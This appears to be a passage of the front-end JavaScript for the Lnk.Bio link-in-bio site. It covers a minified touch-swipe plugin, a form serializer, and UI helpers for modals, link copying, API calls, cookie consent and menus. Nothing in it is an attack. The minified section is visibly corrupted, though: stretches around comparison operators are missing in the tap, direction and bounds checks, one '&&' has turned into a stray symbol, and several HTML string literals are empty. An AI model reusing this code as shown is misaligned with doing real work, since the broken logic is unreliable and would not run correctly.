culateDuration(),setMaxDistance(direction,distance),ret=triggerHandler(event,phase),!options.triggerOnTouchEnd||options.triggerOnTouchLeave){var inBounds=!0;if(options.triggerOnTouchLeave){var bounds=getbounds(this);inBounds=isInBounds(currentFinger.end,bounds)}!options.triggerOnTouchEnd&&inBounds?phase=getNextPhase(PHASE_MOVE):options.triggerOnTouchLeave&&!inBounds&&(phase=getNextPhase(PHASE_END)),phase!=PHASE_CANCEL&&phase!=PHASE_END||triggerHandler(event,phase)}}else phase=PHASE_CANCEL,triggerHandler(event,phase);ret===!1&&(phase=PHASE_CANCEL,triggerHandler(event,phase))}}function touchEnd(jqEvent){var event=jqEvent.originalEvent?jqEvent.originalEvent:jqEvent,touches=event.touches;if(touches){if(touches.length&&!inMultiFingerRelease())return startMultiFingerRelease(event),!0;if(touches.length&&inMultiFingerRelease())return!0}return inMultiFingerRelease()&&(fingerCount=fingerCountAtRelease),endTime=getTimeStamp(),duration=calculateDuration(),didSwipeBackToCancel()||!validateSwipeDistance()?(phase=PHASE_CANCEL,triggerHandler(event,phase)):options.triggerOnTouchEnd||options.triggerOnTouchEnd===!1&&phase===PHASE_MOVE?(options.preventDefaultEvents!==!1&&jqEvent.preventDefault(),phase=PHASE_END,triggerHandler(event,phase)):!options.triggerOnTouchEnd&&hasTap()?(phase=PHASE_END,triggerHandlerForGesture(event,phase,TAP)):phase===PHASE_MOVE&&(phase=PHASE_CANCEL,triggerHandler(event,phase)),setTouchInProgress(!1),null}function touchCancel(){fingerCount=0,endTime=0,startTime=0,startTouchesDistance=0,endTouchesDistance=0,pinchZoom=1,cancelMultiFingerRelease(),setTouchInProgress(!1)}function touchLeave(jqEvent){var event=jqEvent.originalEvent?jqEvent.originalEvent:jqEvent;options.triggerOnTouchLeave&&(phase=getNextPhase(PHASE_END),triggerHandler(event,phase))}function removeListeners(){$element.unbind(START_EV,touchStart),$element.unbind(CANCEL_EV,touchCancel),$element.unbind(MOVE_EV,touchMove),$element.unbind(END_EV,touchEnd),LEAVE_EV&&$element.unbind(LEAVE_EV,touchLeave),setTouchInProgress(!1)}function getNextPhase(currentPhase){var nextPhase=currentPhase,validTime=validateSwipeTime(),validDistance=validateSwipeDistance(),didCancel=didSwipeBackToCancel();return!validTime||didCancel?nextPhase=PHASE_CANCEL:!validDistance||currentPhase!=PHASE_MOVE||options.triggerOnTouchEnd&&!options.triggerOnTouchLeave?!validDistance&¤tPhase==PHASE_END&&options.triggerOnTouchLeave&&(nextPhase=PHASE_CANCEL):nextPhase=PHASE_END,nextPhase}function triggerHandler(event,phase){var ret,touches=event.touches;return(didSwipe()||hasSwipes())&&(ret=triggerHandlerForGesture(event,phase,SWIPE)),(didPinch()||hasPinches())&&ret!==!1&&(ret=triggerHandlerForGesture(event,phase,PINCH)),didDoubleTap()&&ret!==!1?ret=triggerHandlerForGesture(event,phase,DOUBLE_TAP):didLongTap()&&ret!==!1?ret=triggerHandlerForGesture(event,phase,LONG_TAP):didTap()&&ret!==!1&&(ret=triggerHandlerForGesture(event,phase,TAP)),phase===PHASE_CANCEL&&touchCancel(event),phase===PHASE_END&&(touches?touches.length||touchCancel(event):touchCancel(event)),ret}function triggerHandlerForGesture(event,phase,gesture){var ret;if(gesture==SWIPE){if($element.trigger("swipeStatus",[phase,direction||null,distance||0,duration||0,fingerCount,fingerData,currentDirection]),options.swipeStatus&&(ret=options.swipeStatus.call($element,event,phase,direction||null,distance||0,duration||0,fingerCount,fingerData,currentDirection),ret===!1))return!1;if(phase==PHASE_END&&validateSwipe()){if(clearTimeout(singleTapTimeout),clearTimeout(holdTimeout),$element.trigger("swipe",[direction,distance,duration,fingerCount,fingerData,currentDirection]),options.swipe&&(ret=options.swipe.call($element,event,direction,distance,duration,fingerCount,fingerData,currentDirection),ret===!1))return!1;switch(direction){case LEFT:$element.trigger("swipeLeft",[direction,distance,duration,fingerCount,fingerData,currentDirection]),options.swipeLeft&&(ret=options.swipeLeft.call($element,event,direction,distance,duration,fingerCount,fingerData,currentDirection));break;case RIGHT:$element.trigger("swipeRight",[direction,distance,duration,fingerCount,fingerData,currentDirection]),options.swipeRight&&(ret=options.swipeRight.call($element,event,direction,distance,duration,fingerCount,fingerData,currentDirection));break;case UP:$element.trigger("swipeUp",[direction,distance,duration,fingerCount,fingerData,currentDirection]),options.swipeUp&&(ret=options.swipeUp.call($element,event,direction,distance,duration,fingerCount,fingerData,currentDirection));break;case DOWN:$element.trigger("swipeDown",[direction,distance,duration,fingerCount,fingerData,currentDirection]),options.swipeDown&&(ret=options.swipeDown.call($element,event,direction,distance,duration,fingerCount,fingerData,currentDirection))}}}if(gesture==PINCH){if($element.trigger("pinchStatus",[phase,pinchDirection||null,pinchDistance||0,duration||0,fingerCount,pinchZoom,fingerData]),options.pinchStatus&&(ret=options.pinchStatus.call($element,event,phase,pinchDirection||null,pinchDistance||0,duration||0,fingerCount,pinchZoom,fingerData),ret===!1))return!1;if(phase==PHASE_END&&validatePinch())switch(pinchDirection){case IN:$element.trigger("pinchIn",[pinchDirection||null,pinchDistance||0,duration||0,fingerCount,pinchZoom,fingerData]),options.pinchIn&&(ret=options.pinchIn.call($element,event,pinchDirection||null,pinchDistance||0,duration||0,fingerCount,pinchZoom,fingerData));break;case OUT:$element.trigger("pinchOut",[pinchDirection||null,pinchDistance||0,duration||0,fingerCount,pinchZoom,fingerData]),options.pinchOut&&(ret=options.pinchOut.call($element,event,pinchDirection||null,pinchDistance||0,duration||0,fingerCount,pinchZoom,fingerData))}}return gesture==TAP?phase!==PHASE_CANCEL&&phase!==PHASE_END||(clearTimeout(singleTapTimeout),clearTimeout(holdTimeout),hasDoubleTap()&&!inDoubleTap()?(doubleTapStartTime=getTimeStamp(),singleTapTimeout=setTimeout($.proxy(function(){doubleTapStartTime=null,$element.trigger("tap",[event.target]),options.tap&&(ret=options.tap.call($element,event,event.target))},this),options.doubleTapThreshold)):(doubleTapStartTime=null,$element.trigger("tap",[event.target]),options.tap&&(ret=options.tap.call($element,event,event.target)))):gesture==DOUBLE_TAP?phase!==PHASE_CANCEL&&phase!==PHASE_END||(clearTimeout(singleTapTimeout),clearTimeout(holdTimeout),doubleTapStartTime=null,$element.trigger("doubletap",[event.target]),options.doubleTap&&(ret=options.doubleTap.call($element,event,event.target))):gesture==LONG_TAP&&(phase!==PHASE_CANCEL&&phase!==PHASE_END||(clearTimeout(singleTapTimeout),doubleTapStartTime=null,$element.trigger("longtap",[event.target]),options.longTap&&(ret=options.longTap.call($element,event,event.target)))),ret}function validateSwipeDistance(){var valid=!0;return null!==options.threshold&&(valid=distance>=options.threshold),valid}function didSwipeBackToCancel(){var cancelled=!1;return null!==options.cancelThreshold&&null!==direction&&(cancelled=getMaxDistance(direction)-distance>=options.cancelThreshold),cancelled}function validatePinchDistance(){return null===options.pinchThreshold||pinchDistance>=options.pinchThreshold}function validateSwipeTime(){var result;return result=!options.maxTimeThreshold||!(duration>=options.maxTimeThreshold)}function validateDefaultEvent(jqEvent,direction){if(options.preventDefaultEvents!==!1)if(options.allowPageScroll===NONE)jqEvent.preventDefault();else{var auto=options.allowPageScroll===AUTO;switch(direction){case LEFT:(options.swipeLeft&&auto||!auto&&options.allowPageScroll!=HORIZONTAL)&&jqEvent.preventDefault();break;case RIGHT:(options.swipeRight&&auto||!auto&&options.allowPageScroll!=HORIZONTAL)&&jqEvent.preventDefault();break;case UP:(options.swipeUp&&auto||!auto&&options.allowPageScroll!=VERTICAL)&&jqEvent.preventDefault();break;case DOWN:(options.swipeDown&&auto||!auto&&options.allowPageScroll!=VERTICAL)&&jqEvent.preventDefault();break;case NONE:}}}function validatePinch(){var hasCorrectFingerCount=validateFingers(),hasEndPoint=validateEndPoint(),hasCorrectDistance=validatePinchDistance();return hasCorrectFingerCount&&hasEndPoint&&hasCorrectDistance}function hasPinches(){return!!(options.pinchStatus||options.pinchIn||options.pinchOut)}function didPinch(){return!(!validatePinch()||!hasPinches())}function validateSwipe(){var hasValidTime=validateSwipeTime(),hasValidDistance=validateSwipeDistance(),hasCorrectFingerCount=validateFingers(),hasEndPoint=validateEndPoint(),didCancel=didSwipeBackToCancel(),valid=!didCancel&&hasEndPoint&&hasCorrectFingerCount&&hasValidDistance&&hasValidTime;return valid}function hasSwipes(){return!!(options.swipe||options.swipeStatus||options.swipeLeft||options.swipeRight||options.swipeUp||options.swipeDown)}function didSwipe(){return!(!validateSwipe()||!hasSwipes())}function validateFingers(){return fingerCount===options.fingers||options.fingers===ALL_FINGERS||!SUPPORTS_TOUCH}function validateEndPoint(){return 0!==fingerData[0].end.x}function hasTap(){return!!options.tap}function hasDoubleTap(){return!!options.doubleTap}function hasLongTap(){return!!options.longTap}function validateDoubleTap(){if(null==doubleTapStartTime)return!1;var now=getTimeStamp();return hasDoubleTap()&&now-doubleTapStartTime<=options.doubleTapThreshold}function inDoubleTap(){return validateDoubleTap()}function validateTap(){return(1===fingerCount||!SUPPORTS_TOUCH)&&(isNaN(distance)||distanceoptions.longTapThreshold&&distance=0?LEFT:angle<=360&&angle>=315?LEFT:angle>=135&&angle<=225?RIGHT:angle>45&&angle<135?DOWN:UP}function getTimeStamp(){var now=new Date;return now.getTime()}function getbounds(el){el=$(el);var offset=el.offset(),bounds={left:offset.left,right:offset.left+el.outerWidth(),top:offset.top,bottom:offset.top+el.outerHeight()};return bounds}function isInBounds(point,bounds){return point.x>bounds.left&&point.xbounds.top&&point.yr;r++)this.addPair(i[r]);return this}function o(){return l}function c(){return JSON.stringify(o())}var l={},h={};this.addPair=f,this.addPairs=d,this.serialize=o,this.serializeJSON=c}var t={validate:/^[a-z_][a-z0-9_]*(?:\[(?:\d*|[a-z0-9_]+)\])*$/i,key:/[a-z0-9_]+|(?=\[\])/gi,push:/^$/,fixed:/^\d+$/,named:/^[a-z0-9_]+$/i};return r.patterns=t,r.serializeObject=function(){return new r(i,this).addPairs(this.serializeArray()).serialize()},r.serializeJSON=function(){return new r(i,this).addPairs(this.serializeArray()).serializeJSON()},"undefined"!=typeof i.fn&&(i.fn.serializeObject=r.serializeObject,i.fn.serializeJSON=r.serializeJSON),e.FormSerializer=r,r}); - - -(function ($) { - $.fn.visible = function (partial) { - - var $t = $(this), - $w = $(window), - viewTop = $w.scrollTop(), - viewBottom = viewTop + $w.height(), - _top = $t.offset().top, - _bottom = _top + $t.height(), - compareTop = partial === true ? _bottom : _top, - compareBottom = partial === true ? _top : _bottom; - - return ((compareBottom <= viewBottom) && (compareTop >= viewTop)); - }; - -})(jQuery); - -try { - if (location.href.toString().indexOf("/linkmeto.ml/") != -1) { - $('a').attr("href", "https://lnk.bio/404") - } -} catch (error) {} - -function LN_scrollTo(el_selector) { - $([document.documentElement, document.body]).animate({ - scrollTop: $(el_selector).offset().top - 70 - }, 1000) -} - -function LN_isMobile() { - if (matchMedia("(max-width: 576px)").matches) - return true - return false -} - - -if ($(document).height() <= $(window).height()) { - $('footer').addClass("position-absolute") -} -$(function () { - if ($(document).height() <= $(window).height()) { - $('footer').addClass("position-absolute") - } -}); -$(window).on('resize', function () { - footerPositionUpdate() -}); - -function footerPositionUpdate() { - $('#helper4').addClass('d-none') - $('footer').removeClass("position-absolute") - if ($(document).height() <= $(window).height()) { - $('footer').addClass("position-absolute") - } else { - $('footer').removeClass("position-absolute") - } - $('#helper4').removeClass('d-none') -} - -// Manage No Feature Access Modal -$('#PC_featureNoPROModal').on('show.bs.modal', function (e) { - var el = $(e.relatedTarget) - var title = el.data('title') - $('#PC_featureNoPROModalLabel').text(title) -}) - - -// Manage Modals Refreshes -$('.modal').on('show.bs.modal', function (e) { - $(e.target).find('.alert-danger').not(".modal-errors-builtin").remove() - $(e.target).find('.modal-errors').addClass("d-none") -}) - -$('.lnk-copy').on('click', function (e) { - var btn = $(e.target) - if (btn.hasClass('goup')) { - btn = btn.parent(); - } - var url = btn.data('lnk') - $("#lnk-copy-source").show() - var hidden = $("#lnk-copy-source")[0] - $(hidden).val(url) - - - hidden.setSelectionRange(0, hidden.value.length + 1); - hidden.select(); - hidden.setSelectionRange(0, 99999); - try { - var success = document.execCommand('copy'); - if (success) { - $("#lnk-copy-source").hide() - if(btn.data('copied')) { - if (typeof(XXX) == "number") { - clearTimeout(XXX) - } - btn.removeClass('btn-outline-milka').addClass('btn-milka text-white') - btn.find('span').html(btn.data('copied')) - XXX = setTimeout(function() { - btn.removeClass('btn-milka').removeClass('text-white').addClass('btn-outline-milka') - btn.find('span').html(btn.data('copy')) - },2000) - } else { - showToast("Lnk Copied", "", true) - } - - } else { - $("#lnk-copy-source").hide() - } - } catch (err) { - $("#lnk-copy-source").hide() - } - $("#lnk-copy-source").hide() -}); - -// Manage Lnk.Bio Change URL -$('#LB_LnkBioURLModal').on('show.bs.modal', function (e) { - modalIsLoading($('#LB_LnkBioURLModal')); - $.ajax({ - type: "POST", - url: "/api/", - data: { - ACTION: "U_getURLInfo", - token: CSFR_TOKEN - }, - success: function (res) { - modalHasLoaded($('#LB_LnkBioURLModal')); - if (res.status) { - $("#LB_LnkBioURLField").val(res.info.url) - $("#LB_LnkBioURLOld").val(res.info.url) - $('#LB_LnkBioDomainField').val(res.info.domain) - $('#LB_LnkBioDomainOld').val(res.info.domain) - } - } - }); -}) -// Save Lnk.Bio URL -$('#LB_LnkBioURLConfirm').on('click', function () { - modalHideErrors($('#LB_LnkBioURLModal')) - var url = $("#LB_LnkBioURLField").val() - var old_url = $("#LB_LnkBioURLOld").val() - var domain = $("#LB_LnkBioDomainField").val() - var old_domain = $("#LB_LnkBioDomainOld").val() - if (url != old_url || domain != old_domain) { - $.ajax({ - type: "POST", - url: "/api/", - data: { - ACTION: "U_updateLnkBioURL", - url: url, - old_url: old_url, - domain: domain, - old_domain: old_domain, - token: CSFR_TOKEN - }, - success: function (res) { - if (res.status) { - $(".lnkbiourl").text(res.info.url) - $(".lnkbiodomain").text(res.info.domain) - $('.lnkbio-preview').attr("href", res.info.complete_url) - $('.lnkbiocompleteurl').attr("href", res.info.complete_url) - $('.lnk-copy').data('lnk', res.info.complete_url) - $('#LB_LnkBioURLModal').modal('hide') - } else { - modalShowErrors($('#LB_LnkBioURLModal'), res.errors[0]) - } - }, - dataType: "json" - }) - } -}); - -// Manage Long URLs -$('#ST_ShortURLModal').on('show.bs.modal', function (e) { - var url = $(e.relatedTarget).data('url') - $("#ST_ShortURLLong").text(url) -}) - -function showToast(title, body, is_active) { - if (typeof (is_active) == "undefined") - return; - if (!title) - return - var last_char = title.charAt(title.length - 1); - if (last_char.match(['A-Za-z'])) - title = title + "." - $('#toast-main > .toast-header > strong').text(title) - $('#toast-main').toast('show') - $('#toast-main').removeClass('d-none') -} -$('#toast-main').on('hidden.bs.toast ', function () { - $('#toast-main').addClass('d-none') -}) - - -function showAlert(parent_el, text, clear_container, additional_class) { - if (!text || !parent_el) return - - var last_char = text.charAt(text.length - 1); - if (last_char.match(['A-Za-z'])) - text = text + "." - - - if (typeof (additional_class) == "undefined") { - additional_class = ""; - } - - if (typeof (clear_container) == "undefined") { - clear_container = true; - } - if (clear_container) { - parent_el.children('.alert').remove() - } - var html = ''; - parent_el.append(html) -} - - - -function pad(num, size) { - var s = num + ""; - while (s.length < size) s = "0" + s; - return s; -} - -function humanDate(date) { - var date = new Date(date); - var month = date.toLocaleString('default', { - month: 'short' - }); - return date.getDate() + " " + month; -} - -function hours24to12(i, minutes) { - if (i == 0) { - american_hour = 12 - label = "AM" - } else if (i < 12) { - american_hour = i - label = "AM" - } else if (i == 12) { - american_hour = i - label = "PM" - } else { - american_hour = i - 12 - label = "PM" - } - if (typeof (minutes) != "undefined") { - american_hour += ":" + pad(minutes, 2) - } - return american_hour + " " + label; -} - - - -/* Utility function to convert a canvas to a BLOB */ -function dataURLToBlob(dataURL) { - var BASE64_MARKER = ";base64,"; - if (dataURL.indexOf(BASE64_MARKER) == -1) { - var parts = dataURL.split(","); - var contentType = parts[0].split(":")[1]; - var raw = parts[1]; - - return new Blob([raw], { - type: contentType - }); - } - - var parts = dataURL.split(BASE64_MARKER); - var contentType = parts[0].split(":")[1]; - var raw = window.atob(parts[1]); - var rawLength = raw.length; - - var uInt8Array = new Uint8Array(rawLength); - - for (var i = 0; i < rawLength; ++i) { - uInt8Array[i] = raw.charCodeAt(i); - } - - return new Blob([uInt8Array], { - type: contentType - }); -} - -// Manage the Spinner -function LN_initSpinner() { - var html = '
' + - 'Loading...' + - '
'; - $('#add-new-link-form .nl-spinner').html(html) -} - -function LN_removeSpinner() { - $('#add-new-link-form .nl-spinner .spinner-border').remove() -} - -// Manage the Spinner -// @el is a jquery object of the form -function form_InitSpinner(el) { - el.find('.spinner-container').removeClass('d-none') -} - -function form_RemoveSpinner(el) { - el.find('.spinner-container').addClass('d-none') -} - -function modal_InitSpinner(el) { - el.find('.spinner-border').removeClass('d-none') -} - -function modal_RemoveSpinner(el) { - el.find('.spinner-border').addClass('d-none') -} - -// Manage Form Errors -function formHideErrors(form) { - form.find('.alert-danger').addClass('d-none') -} - -function formShowErrors(form, error) { - form.find('.alert-danger').removeClass('d-none') - try { - var last_char = error.slice(-1) - if (last_char.match(/[a-zA-Z]+/)) - error = error + '.' - } catch (err) {} - form.find('.alert-danger').html(error) -} - -// Manage Modal Errors -function modalHideErrors(modal) { - modal.find('.modal-errors').addClass('d-none') - modal.find('.modal-success').addClass('d-none') -} - -function modalShowErrors(modal, error) { - modal.find('.modal-errors').removeClass('d-none') - try { - var last_char = error.slice(-1) - if (last_char.match(/[a-zA-Z]+/)) - error = error + '.' - } catch (err) {} - modal.find('.modal-errors .alert').html(error) -} -function modalShowSuccess(modal, error) { - modal.find('.modal-success').removeClass('d-none') - try { - var last_char = error.slice(-1) - if (last_char.match(/[a-zA-Z]+/)) - error = error + '.' - } catch (err) {} - modal.find('.modal-success .alert').html(error) -} -// Manage Timezone -$('.modal').on('show.bs.modal', function (e) { - $(e.relatedTarget).find('.modal-errors').addClass('d-none') -}) - -function refreshInstagramPictureBackendError() { - $.ajax({ - type: "POST", - url: "/api/", - data: { - ACTION: "IG_refreshPicture", - token: CSFR_TOKEN - }, - success: function (res) { - if (res.status) { - $('#profile_picture_catch_error').attr('src', res.info.profile_pic) - } - }, - dataType: "json" - }) -} - - -function refreshTikTokPictureBackendError() { - $.ajax({ - type: "POST", - url: "/api/", - data: { - ACTION: "TK_refreshPicture", - token: CSFR_TOKEN - }, - success: function (res) { - if (res.status) { - $('#profile_picture_catch_error').attr('src', res.info.profile_pic) - } - }, - dataType: "json" - }) -} - -ALREADY_SUBMITTED_ERROR = 0 -// Manage Profile Picture Error -function checkImageError(e) { - var img_el = $(e.target) - if (img_el.data('backup-src')) { - if (ALREADY_SUBMITTED_ERROR === 1) { - return - } - img_el.attr('src', img_el.data('backup-src')) - } - var el_id = img_el.attr("id") - if (el_id != "profile_picture_catch_error") return - if (img_el.hasClass('agency-active-user') || img_el.hasClass('agency-inactive-user')) { - return - } - var username = img_el.data('username') - - if (ALREADY_SUBMITTED_ERROR === 1) { - return - } - - if (img_el.hasClass('pb-profilepic')) { // Public Error Management - ALREADY_SUBMITTED_ERROR = 1; - $.ajax({ - el_id: el_id, - type: "POST", - url: "/api/", - data: { - ACTION: "PUB_logPicError", - username: username, - token: CSFR_TOKEN - }, - dataType: "json" - }) - return - } - - if (img_el.data('istiktok')) { - refreshTikTokPictureBackendError() - } else { - refreshInstagramPictureBackendError() - } - - - - return false; -} - -// Manage print Invoice function -function printInvoice(divName) { - var invoice = document.getElementById(divName).innerHTML; - originalBodyContent = $('body').html(); - document.body.innerHTML = invoice; - window.print(); - setTimeout(function () { - document.body.innerHTML = originalBodyContent - }, 1000) - -} - -function closeMessage(OPTION_ID) { - var options = {}; - options[OPTION_ID] = 1 - $.ajax({ - type: "POST", - url: "/api/", - data: { - ACTION: "U_updateOptions", - options: options, - token: CSFR_TOKEN - } - }) -} - -$('.close-msg').on('click', function () { - $(this).closest('.msg-popup').remove() - closeMessage($(this).data('optionid')) -}) - -EU_COUNTRIES = ["BE", "BG", "CZ", "DK", "DE", "EE", "IE", "EL", "ES", "FR", "HR", "IT", "CY", "LV", "LT", "LU", "HU", "MT", "NL", "AT", "PL", "PT", "RO", "SI", "SK", "FI", "SE"]; - -if (typeof (_iub) != "undefined") { - - $.ajax({ - type: "GET", - url: 'https://freegeoip.app/json/', - success: function (data) { - var country = data.country_code - if ($.inArray(country, EU_COUNTRIES) != -1) { - $.getScript(" //cdn.iubenda.com/cs/iubenda_cs.js"); - } - }, - dataType: 'json' - }) -} - -$('.modal').on('hide.bs.modal ', function () { - $(this).addClass('faded') - setTimeout(function () { - $(this).removeClass('faded') - }, 2000) -}) - -$('.modal').on('show.bs.modal ', function () { - $(this).removeClass('faded') -}) - -$(function () { - let isMobile = window.matchMedia("only screen and (max-width: 760px)").matches; - - if (isMobile) { - try { - $(".modal:not(.modal-fullscreen,#PB_CalendarModal,#PY_ChooseDLocalModal)").swipe({ - swipeDown: function (event, direction, distance, duration, fingerCount, fingerData) { - if ($(this).data('noslidedown')) { - return; - } - $(this).modal('hide') - } - }); - } catch (err) {} - } -}); - -function isRunningStandalone() { - return navigator.standalone || (window.matchMedia("(display-mode: standalone)").matches); -} - -function isIOS() { - const userAgent = window.navigator.userAgent.toLowerCase(); - return /iphone|ipad|ipod/.test(userAgent); -} - -if (isRunningStandalone()) { - $('.mobileapp-install-menu').hide() -} - -function setCookie(cname, cvalue, exdays) { - var d = new Date(); - d.setTime(d.getTime() + (exdays * 24 * 60 * 60 * 1000)); - var expires = "expires=" + d.toUTCString(); - document.cookie = cname + "=" + cvalue + ";" + expires + ";path=/"; -} - -function getCookie(cname) { - var name = cname + "="; - var decodedCookie = decodeURIComponent(document.cookie); - var ca = decodedCookie.split(';'); - for (var i = 0; i < ca.length; i++) { - var c = ca[i]; - while (c.charAt(0) == ' ') { - c = c.substring(1); - } - if (c.indexOf(name) == 0) { - return c.substring(name.length, c.length); - } - } - return ""; -} - -if (typeof (PWA_VERSION) != "undefined" && navigator.userAgent != "LnkBioMobileApp") { - try { - const broadcast = new BroadcastChannel('LNKBIO_PWA'); - $(function () { - if ("serviceWorker" in navigator) { - navigator.serviceWorker.register("/sw.min.js?v=4").then(function (reg) { - - broadcast.postMessage({ - type: 'PWA_VERSION', - PWA_VERSION: PWA_VERSION - }); - }); - } - }); - } catch (error) {} -} - -$(".btn-spinner").click(function () { - // disable button - $(this).prop("disabled", true); - // add spinner to button - $(this).prepend(''); -}); - -function resetButtonSpinner(btn) { - btn.prop("disabled", false); - btn.find('span.spinner-border').remove() -} - - -function associativeToArray(associative) { - var ret = [] - for (i in associative) { - var inner = { - 'social_id': i, - 'social_link': associative[i] - } - ret.push(inner) - } - return ret -} - -function modalIsLoading(modal) { - modal.find('.loading-container').removeClass('d-none') - modal.find('.loaded-container').addClass('d-none') -} - -function modalHasLoaded(modal) { - modal.find('.loaded-container').removeClass('d-none') - modal.find('.loading-container').addClass('d-none') -} -$(function () { - try { - $('[data-toggle="popover"]').popover() - } catch (Exception){} -}) - -LOADING_BUTTON = ''; -$('body').on('click', '.btn-loading', function () { - LOADING_BUTTON = $(this) - $(this).find('.spinner-grow').remove() - $(this).append('') -}) - -function stopLoadingButton() { - if (typeof (LOADING_BUTTON) == "undefined" || !LOADING_BUTTON) { - return - } - LOADING_BUTTON.find(".spinner-grow").remove() -} - -DISABLING_BUTTON = '' -$('body').on('click', '.btn-disable-after-click', function () { - DISABLING_BUTTON = $(this) - setTimeout(function () { - DISABLING_BUTTON.attr("disabled", "disabled") - }, 100) -}) - -function reEnableButton() { - if (typeof (DISABLING_BUTTON) == "undefined" || !DISABLING_BUTTON) { - return - } - DISABLING_BUTTON.removeAttr("disabled") - setTimeout(function () { - DISABLING_BUTTON.removeAttr("disabled") - }, 100) -} - -ACCEPTED_IMAGE_FILES = [ - 'image/jpeg', - 'image/png', - 'image/webp', - 'image/gif', - 'image/svg+xml' -] - -$('.modal').on('show.bs.modal', function () { - if (!$(this).data('originaltitle')) { - $(this).data('originaltitle', $(this).find('h5.modal-title').html()) - } -}) - -$(function() { - $('.loading-remove').addClass("d-none") -}); - -function modalAddAction(modal, action_html) { - let header = modal.find('.modal-header') - header.find('.modal-action').remove() - header.append(action_html) -} - -function modalRemoveActions(modal) { - let header = modal.find('.modal-header') - header.find('.modal-action').remove() -} - -function uniqueArray(array) { - var unique = []; - $.each(array, function (i, el) { - if ($.inArray(el, unique) === -1) unique.push(el); - }); - return unique -} - -function removeFromArray(arr, value) { - var index = arr.indexOf("" + value); - if (index > -1) { - arr.splice(index, 1); - } - return arr; -} - -$('#PB_MenuModal').on('show.bs.modal', function () { - resetMenuModal() -}) - -function resetMenuModal() { - $('#PB_MenuModal').find('.modal-back').addClass("d-none") - $('#PB_MenuBack').addClass("d-none") - $('.menu-primary').removeClass("d-none") - $('.menu-subsection').addClass("d-none") - $('#PB_MenuModal').find('.modal-title').html($('#PB_MenuModal').data('originaltitle')) -} - -function openSubsection(id, modaltitle) { - $('.menu-primary').addClass("d-none") - $('.menu-subsection').addClass("d-none") - $('.menu-subsection.subsection-' + id).removeClass('d-none') - $('#PB_MenuModal').find('.modal-title').html(modaltitle) - $('#PB_MenuModal').find('.modal-back').removeClass("d-none") - $('#PB_MenuBack').removeClass("d-none") - -} - -$('#PB_MenuModal').find('.menu-open-subsections').on('click', function () { - let id = $(this).data('id') - let modaltitle = $(this).data('modaltitle') - openSubsection(id, modaltitle) - let parent = $(this).data('parent') - let parent_title = $(this).data('parenttitle') - if (parent > 0) { - $('#PB_MenuModal').data('parent', parent) - $('#PB_MenuModal').data('parenttitle', parent_title) - } else { - $('#PB_MenuModal').data('parent', 0) - $('#PB_MenuModal').data('parenttitle', '') - } -}) - -$('#PB_MenuBack').on('click', function () { - let parent = $('#PB_MenuModal').data('parent'); - let parent_title = $('#PB_MenuModal').data('parenttitle'); - if (parent > 0) { - openSubsection(parent, parent_title) - $('#PB_MenuModal').data('parent', 0) - } else { - resetMenuModal() - } -}) - -$('#PB_MenuModal').find('.modal-back').on('click', function () { - let parent = $('#PB_MenuModal').data('parent'); - let parent_title = $('#PB_MenuModal').data('parenttitle'); - if (parent > 0) { - openSubsection(parent, parent_title) - $('#PB_MenuModal').data('parent', 0) - } else { - resetMenuModal() - } -}) - -function resetMenuAgencyModal(){ - $('#PB_MenuAgencyProfileModal').find('.modal-back').addClass("d-none") - $('.menu-primary').removeClass("d-none") - $('.menu-subsection').addClass("d-none") - $('#PB_MenuAgencyProfileModal').find('.modal-title').html($('#PB_MenuAgencyProfileModal').data('originaltitle')) -} - -function openSubsectionAgency(id, modaltitle) { - $('.menu-primary').addClass("d-none") - $('.menu-subsection').addClass("d-none") - $('.menu-subsection.subsection-' + id).removeClass('d-none') - $('#PB_MenuAgencyProfileModal').find('.modal-title').html(modaltitle) - $('#PB_MenuAgencyProfileModal').find('.modal-back').removeClass("d-none") - $('#PB_MenuAgencyProfileModalBack').removeClass("d-none") - -} - -$('#PB_MenuAgencyProfileModal').on('show.bs.modal', function () { - resetMenuAgencyModal() -}) - -$('#PB_MenuAgencyProfileModal').find('.modal-back').on('click', function () { - let parent = $('#PB_MenuAgencyProfileModal').data('parent'); - let parent_title = $('#PB_MenuAgencyProfileModal').data('parenttitle'); - if (parent > 0) { - openSubsectionAgency(parent, parent_title) - $('#PB_MenuAgencyProfileModal').data('parent', 0) - } else { - resetMenuAgencyModal() - } -}) - -$('#PB_MenuAgencyProfileModal').find('.menu-open-subsections').on('click', function () { - let id = $(this).data('id') - let modaltitle = $(this).data('modaltitle') - openSubsectionAgency(id, modaltitle) - let parent = $(this).data('parent') - let parent_title = $(this).data('parenttitle') - if (parent > 0) { - $('#PB_MenuAgencyProfileModal').data('parent', parent) - $('#PB_MenuAgencyProfileModal').data('parenttitle', parent_title) - } else { - $('#PB_MenuAgencyProfileModal').data('parent', 0) - $('#PB_MenuAgencyProfileModal').data('parenttitle', '') - } -}) - - - -$('#navbar-top').find('span[aria-controls="navbarNav"]').on('click', function () { - resetMenuModal() - let icon = $('#navbar-top').find('span[aria-controls="navbarNav"]').find('i') - if (!$('#navbarNav').hasClass('show')) { - icon.removeClass("far").addClass("fas").addClass('font-weight-bold') - } else { - icon.removeClass("fas").addClass("far").removeClass('font-weight-bold') - } -}) - -$('body').on('click', function (e) { - if ($(e.target).closest('.navbar-collapse').length == 0) { - try { - $('.navbar-collapse').collapse('hide'); - } catch(e) {} - } -}); - -function getParameterByName(name, url) { - if (!url) url = window.location.href; - name = name.replace(/[\[\]]/g, "\\$&"); - var regex = new RegExp("[?&]" + name + "(=([^&#]*)|&|#|$)"), - results = regex.exec(url); - if (!results) return null; - if (!results[2]) return ''; - return decodeURIComponent(results[2].replace(/\+/g, " ")); -} -$(function() { - $('#coco_accept').on('click', function () { - let user_id = 0; - if ($('#LB_UserID').val()) { - user_id = $('#LB_UserID').val() - } - $.ajax({ - url: "/api/", - method: "POST", - dataType: "json", - data: { - ACTION: 'PUB_cookieConsentAccept', - user_id: user_id, - token: CSFR_TOKEN - }, - success: function (res) { - - if (res.status) { - $('head').append(res.info.codes) - $('#pb_cookie_consent').addClass('d-none') - if (typeof(gtag) != "undefined") { - gtag('consent', 'update', { - 'analytics_storage': 'granted', - 'functionality_storage': 'granted', - 'security_storage': 'granted' - }); - } - } - } - }); - }) - - $('#coco_reject').on('click', function () { - $.ajax({ - url: "/api/", - method: "POST", - dataType: "json", - data: { - ACTION: 'PUB_cookieConsentDeny', - token: CSFR_TOKEN - }, - success: function (res) { - if (res.status) { - $('#pb_cookie_consent').addClass('d-none') - gtag('consent', 'update', { - 'analytics_storage': 'denied', - 'functionality_storage': 'denied', - 'security_storage': 'denied' - - }); - } - } - }); - }) - - 